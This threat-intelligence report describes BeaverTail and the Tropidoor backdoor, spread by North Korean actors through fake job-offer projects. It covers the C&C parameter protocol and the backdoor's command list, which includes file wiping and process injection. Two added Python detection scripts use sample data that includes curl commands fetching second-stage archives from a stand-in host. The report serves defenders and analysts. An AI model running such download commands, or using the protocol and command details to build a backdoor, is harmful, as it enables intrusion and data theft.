BeaverTail and Tropidoor Malware Distributed via Recruitment Emails
On November 29, 2024, a case was disclosed in which threat actors impersonated a recruitment email from the developer community Dev.to to distribute malware. [1] The attacker provided a BitBucket link to a project; the victim discovered malicious code within the project and disclosed it to the community. The project contained BeaverTail, disguised as “tailwind.config.js,” and a downloader malware named “car.dll”.

Figure 1. Attack disclosed in the developer community
Although the link is no longer available for download, VirusTotal holds compressed files containing the “car.dll” downloader and BeaverTail. Analysis of these files confirmed execution logs of “car.dll” and the presence of BeaverTail on systems in South Korea. BeaverTail is known to be used by North Korean threat actors for information theft and for downloading additional payloads.
The backdoor that the “car.dll” downloader loads into memory is characterized by implementing Windows commands internally, similar to the LightlessCan malware of the Lazarus group disclosed in a past ESET report.
1. Attack Details
The project file obtained from VirusTotal contains the downloader malware “car.dll” and the BeaverTail malware “tailwind.config.js”, which is responsible for executing the downloader. Another compressed file also contained a similar BeaverTail and the same downloader, distributed under the name “img_layer_generate.dll”.

Figure 2. Inside the project file
BeaverTail is known to be distributed primarily in phishing attacks disguised as job offers, such as those targeting LinkedIn users. While most known cases involve attacks overseas, there have been related cases in Korea as well. The case above is also a foreign case, but it is notable because related logs were found in Korea. The installation path, too, is similar to the one mentioned in the post above, with the “autopart” keyword present in “%SystemDrive%\0_***workfile\_work\autosquare\autopart\car.dll”.

Figure 3. Downloader execution logs
Additionally, logs suspected to originate from BeaverTail were observed a few minutes after the downloader was installed on the system. The use of curl for downloading and the names of the downloaded files, “p.zi” and “p2.zip”, are known BeaverTail behaviors. [2] The download address also matches the one mentioned in the BeaverTail report published by Zscaler in November 2024.
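The host-side indicators in this section (curl pulling “p.zi”/“p2.zip”, and “car.dll” or “img_layer_generate.dll” launched from a path containing “autopart” by the script-running parent) can be turned into a small triage rule over process-creation telemetry. The following is an added example written for this article, not code from the report or from AhnLab; the event records, paths, pids and the 203.0.113.10 download host are constructed sample data, and the assumption that the DLL is launched via rundll32.exe is the author's own (the report does not state how BeaverTail invokes it).

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon event 1 / EDR style)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Patterns taken from the indicators described in the report:
#  - curl writing the BeaverTail second-stage archives p.zi / p2.zip
#  - car.dll or img_layer_generate.dll under a directory named "autopart"
#  - the BeaverTail dropper script tailwind.config.js (used to link parent and child)
CURL_STAGE = re.compile(r"\bcurl(\.exe)?\b.*\b(p\.zi|p2\.zip)\b", re.I)
LOADER_DLL = re.compile(r"\\autopart\\(car|img_layer_generate)\.dll\b", re.I)
JS_DROPPER = re.compile(r"\btailwind\.config\.js\b", re.I)


def triage(events):
    """Return (rule_name, pid) findings for every event matching an indicator.

    A loader-DLL hit whose parent process runs tailwind.config.js is additionally
    reported as the BeaverTail -> Tropidoor chain, since the report states that
    the script is what executes car.dll.
    """
    findings = []
    by_pid = {e.pid: e for e in events}
    for e in events:
        if CURL_STAGE.search(e.cmdline):
            findings.append(("beavertail_curl_download", e.pid))
        if LOADER_DLL.search(e.cmdline):
            findings.append(("tropidoor_loader_dll", e.pid))
            parent = by_pid.get(e.ppid)
            if parent is not None and JS_DROPPER.search(parent.cmdline):
                findings.append(("beavertail_to_tropidoor_chain", e.pid))
    return findings


# Constructed sample telemetry (hypothetical paths; not logs from the report).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Program Files\nodejs\node.exe",
              r"node.exe C:\dev\proj\tailwind.config.js"),
    # rundll32 invocation is an assumption; the report only says the script runs car.dll
    ProcEvent(300, 200, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\dev\proj\autosquare\autopart\car.dll"),
    ProcEvent(400, 200, r"C:\Windows\System32\curl.exe",
              "curl.exe -o p.zi http://203.0.113.10/p.zi"),
    ProcEvent(401, 200, r"C:\Windows\System32\curl.exe",
              "curl.exe -o p2.zip http://203.0.113.10/p2.zip"),
    # benign curl use that must not fire
    ProcEvent(500, 100, r"C:\Windows\System32\curl.exe",
              "curl.exe -O https://example.com/tools.zip"),
]


if __name__ == "__main__":
    for rule, pid in triage(SAMPLE_EVENTS):
        print(f"{rule:32s} pid={pid}")
```

The parent/child link is what gives the chain rule its value: a lone curl download of a file named “p.zi” is a weak signal, but a script-runner parent that both pulls those archives and launches a DLL from an “autopart” directory reproduces the sequence the report's execution logs show.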
2. BeaverTail
The JavaScript malware named “tailwind.config.js” includes an obfuscated routine and a routine that executes “car.dll” from the same path.

Figure 4. Obfuscation routine and car.dll execution routine
The obfuscated routine is the BeaverTail malware itself, which acts as an infostealer and downloader: it targets web browsers to steal credentials and cryptocurrency wallet data, and downloads additional malware such as InvisibleFerret.

Figure 5. Uploading exfiltrated information and downloading additional payload
3. Tropidoor
The malware that the downloader runs in memory is a backdoor. Upon execution, it decrypts four C&C server addresses and attempts to connect to them. After a successful connection, it collects basic system information and generates a random 0x20-byte key, which is encrypted with an RSA public key and transmitted. The embedded RSA public key is Base64-encoded (Base64 is an encoding, not encryption, so the key is trivially recoverable by an analyst), and the randomly generated 0x20-byte key is used to encrypt packets during subsequent C&C communication.

Figure 6. Decrypted RSA public key and encryption routine
In the first communication with the C&C server, the system information collected above and the random key encrypted with the RSA public key are Base64-encoded and transmitted in the “tropi2p” and “gumi” parameters, respectively. A random 5-byte string is then generated; it is likely a session ID, because it is sent in the “s_width” parameter in all subsequent exchanges.
| URL Format | Description |
|---|---|
| tropi2p=[Info]&gumi=[Key]&s_width=[SessionID] | Transfer information |
| letter=400BadRequest&s_width=[SessionID] | Receive commands |
| letter=[Result]&s_width=[SessionID] | Send command execution results |
Table 1. URL format for C&C communication
Afterward, the string “400BadRequest” is placed in the “letter” parameter and sent to the C&C server; the server's reply to this request carries the threat actor's command. After executing the received command, the backdoor encodes the result in the same way and returns it in the “letter” parameter.
The backdoor accepts the following commands from the C&C server. Most resemble commands found in other backdoors, but command #34 is unusual.
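Because the three request shapes in Table 1 differ only in their parameter set, the protocol can be recognised from proxy or web-server logs without decrypting anything: the check-in carries “tropi2p” and “gumi”, the poll carries the literal “letter=400BadRequest”, the result carries a Base64 “letter”, and all three share a 5-character “s_width” session ID. The following is an added example written for this article (not code from the report or from AhnLab) that classifies form-encoded query strings against Table 1 and flags sessions showing the check-in-then-poll sequence; the sample queries, hostname, session ID and the 256-byte stand-in for the RSA ciphertext are constructed, and whether the parameters travel in a GET query or a POST body is not stated in the report, so the function simply takes the raw encoded string.

```python
import base64
import binascii
from urllib.parse import parse_qs, urlencode

SESSION_ID_LEN = 5   # random 5-byte string carried in s_width
KEY_LEN = 0x20       # size of the random packet-encryption key wrapped with RSA


def _b64(value):
    """Decode a Base64 value taken from a query string, or return None.

    Under application/x-www-form-urlencoded a bare '+' is decoded to a space by
    parse_qs; a client that does not percent-encode its Base64 would therefore
    break naive decoding, so restore '+' before validating.
    """
    try:
        return base64.b64decode(value.replace(" ", "+"), validate=True)
    except (binascii.Error, ValueError):
        return None


def classify_c2_request(query):
    """Map one encoded request to ('checkin'|'poll'|'result', session_id) or None."""
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    sid = params.get("s_width")
    if sid is None or len(sid) != SESSION_ID_LEN:
        return None
    if "tropi2p" in params and "gumi" in params:
        info, wrapped_key = _b64(params["tropi2p"]), _b64(params["gumi"])
        # the RSA ciphertext cannot be shorter than the 0x20-byte key it wraps
        if info is not None and wrapped_key is not None and len(wrapped_key) >= KEY_LEN:
            return ("checkin", sid)
        return None
    letter = params.get("letter")
    if letter == "400BadRequest":
        return ("poll", sid)
    if letter and _b64(letter) is not None:
        return ("result", sid)
    return None


def suspicious_sessions(queries):
    """Group classified requests by session ID and keep sessions that show both
    the initial check-in and at least one command poll."""
    seen = {}
    for q in queries:
        hit = classify_c2_request(q)
        if hit:
            kind, sid = hit
            seen.setdefault(sid, []).append(kind)
    return {sid: seq for sid, seq in seen.items() if "checkin" in seq and "poll" in seq}


# Constructed sample traffic (not captured data).
_SID = "aB3xQ"
_INFO = base64.b64encode(b"host=WIN-DEV;user=dev;os=10.0").decode()
_KEY = base64.b64encode(bytes(range(256))).decode()    # stand-in for a 256-byte RSA ciphertext
_RESULT = base64.b64encode(b"Active Connections ...").decode()
SAMPLE_QUERIES = [
    urlencode({"tropi2p": _INFO, "gumi": _KEY, "s_width": _SID}),   # properly percent-encoded
    f"letter=400BadRequest&s_width={_SID}",
    urlencode({"letter": _RESULT, "s_width": _SID}),
    f"tropi2p={_INFO}&gumi={_KEY}&s_width={_SID}",                  # raw, '+' not encoded
    "letter=400BadRequest&s_width=toolong",                          # wrong session-ID length
    "q=search&page=2",                                               # benign
]


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(classify_c2_request(q), q[:60])
    print(suspicious_sessions(SAMPLE_QUERIES))
```

The session grouping matters more than any single match: a lone “letter=400BadRequest” could occur by accident, but a 5-character “s_width” value that first appears beside “tropi2p”/“gumi” and then recurs on poll and result requests reproduces the exact exchange described above.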
| Command No. | Description |
|---|---|
| 3 | “netstat -ano” command |
| 4 | “ipconfig /all” command |
| 5 | “systeminfo” command |
| 6 | “dir” command |
| 7 | File deletion (overwrite with NULL data) |
| 8 | File time modification |
| 9 | Screenshot capture |
| 10 | File scan |
| 12 | Process execution |
| 13 | Process execution (user token) |
| 14 | Process termination |
| 15 | Specific address scan |
| 16 | Inject downloaded payload into another process or load in memory |
| 17 | File deletion (overwrite with random values) |
| 19 | Compress and send files as zip |
| 23 | Collect drive information |
| 24 | Collect file information |
| 25 | Set wait time |
| 26 | Save as configuration file (“C:\ProgramData\Microsoft\DeviceSync\WinRT_DeviceSync.etl”) |
| 28 | Send configuration data |
| 29 | Modify configuration data |
| 30 | Send string “tZeqxYw” |
| 32 | Send data read via pipe communication |
| 34 | Execute Windows commands |
Table 2. C&C command no.
Command 34 directly implements basic Windows commands such as “schtasks”, “ping”, and “reg” inside the backdoor's own code, so they run without invoking the corresponding system executables. This method is similar to the LightlessCan malware reported by ESET in the past. [3]

Figure 7. Windows commands implemented in the code
4. Conclusion
Attacks attributed to North Korean threat actors continue to be confirmed. The case described here revealed the attack details of the BeaverTail malware, previously known for attacks targeting users overseas, and the malware used in this case also showed connections to earlier attack cases.
Users should be cautious not only with email attachments but also with executable files and source projects from unknown sources. Updating V3 to the latest version can help prevent malware infection in advance.